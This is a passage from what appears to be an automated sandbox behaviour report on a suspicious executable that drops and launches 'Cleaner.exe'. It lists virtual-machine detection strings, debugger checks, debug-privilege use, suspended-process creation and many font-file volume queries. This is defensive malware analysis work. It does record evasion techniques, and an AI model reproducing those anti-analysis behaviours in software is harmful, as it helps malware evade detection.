Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: Amcache.hve.30.dr	Binary or memory string: VMware
Source: Amcache.hve.30.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Cleaner.exe, 00000021.00000002.658091156.0000024B7E02C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: Amcache.hve.30.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: file.exe, 00000000.00000000.308421884.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.30.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000000.306966127.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.30.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.30.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.30.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Process token adjusted: Debug

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"	Jump to behavior

Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: F.program manager^
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
